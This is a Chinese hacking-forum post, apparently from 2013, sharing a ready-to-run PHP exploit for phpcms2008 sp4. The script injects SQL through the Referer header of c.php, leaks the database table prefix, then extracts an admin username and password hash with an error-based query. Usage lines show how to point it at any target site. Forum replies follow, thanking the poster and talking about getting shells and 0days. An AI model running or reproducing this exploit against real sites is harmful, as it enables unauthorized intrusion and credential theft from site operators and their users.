phpcms2008 sp4 注入Exp (保号 我也发个exp)
保号 我也发个exp
前段时间 情深哥哥 和西毒二货 都发过了
抱着学习的太多 自已也写了一个。。。
前段时间 情深哥哥 和西毒二货 都发过了
抱着学习的太多 自已也写了一个。。。
<?php
print_r ( "
+---------------------------------------+
title:phpcms2008 sp4 c.php exploit
mail:[email protected]
blog:[url]www.moonhack.org[/url]
bbs:[url]www.xinyues.org[/url]
data:2013.3.28
+---------------------------------------+\n
" );
if ($argc < 2) {
print_r ( "
+---------------------------------------+
target:
php $argv[0] [url]www.target.com[/url]
php $argv[0] [url]www.target.com[/url] /phpcms2008/
+---------------------------------------+\n
" );
exit ();
}
error_reporting ( E_ALL );
ini_set ( 'max_execution_time', '0' );
function send_http($host, $prot, $referer) {
$data = "";
$fp = @fsockopen ( $host, $prot, $errno, $errstr, 30 );
if (! $fp) {
exit ( "$host Connection failed" );
} else {
fwrite ( $fp, $referer );
while ( ! feof ( $fp ) ) {
$data .= fgets ( $fp, 128 );
}
fclose ( $fp );
return $data;
}
}
$host = $argv [1];
$prot = "80";
$patch = isset ( $argv [2] ) ? $argv [2] : "";
$sql = "fuck'";
$prefix = http ( $host, $prot, $sql, $patch );
function http($host, $prot, $sql, $patch) {
$preg = '/INSERT INTO `(.*)ads_/';
$prefix = '';
$referer = "GET /$patch" . "c.php?id=1 HTTP/1.1\r\n";
$referer .= "Host: $host\r\n";
$referer .= "REFERER: $sql\r\n";
$referer .= "Connection: Close\r\n\r\n";
$data = send_http ( $host, $prot, $referer );
$data ;
preg_match ( $preg, $data, $prefix );
if (! $prefix) {
exit ( "fail\r\n" );
}
print ("prefix:$prefix[1]") ;
return $prefix [1];
}
$exp = http2 ( $host, $prot, $patch, $prefix );
function http2($host, $prot, $patch, $prefix) {
$preg = '/\'~\'(.*):(.*)\'~1\'/';
$sql2 = $sqlstring = "fuck'),('a','123','123','123',(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from " . $prefix . "member limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a))#";
$referer = "GET /$patch" . "c.php?id=1 HTTP/1.1\r\n";
$referer .= "Host: $host\r\n";
$referer .= "REFERER: $sql2\r\n";
$referer .= "Connection: Close\r\n\r\n";
$data = send_http ( $host, $prot, $referer );
preg_match ( $preg, $data, $exp );
if (! $exp) {
exit ( "fail\r\n" );
}
return $exp;
}
print_r ( "
success:$host
username:$exp[1]
password:$exp[2]
" );
?>关于作者
评论58次
楼主的图为什么没有水印?还是工具效率高啊 我手都撸酸了 也没到高潮啊
这个很老了感觉、·
后台难拿到shell啊
什么这哪的的 0day才是王道
..........不错啊
谢谢楼主分享
不知道对现在的phpcms管不管用 试试看了
漏洞满天飞
都发过了。。再来一遍 呵呵。
貌似 在哪见过·
没有啊 我前几天才找他
:)
又来保号行动了
mark
我想问的是,情深是不是被请去喝茶去了?
收一个
论坛这两天那么活跃
保号的EXP真多呀。。。。。
保号行动大开始
这个 版权很多啊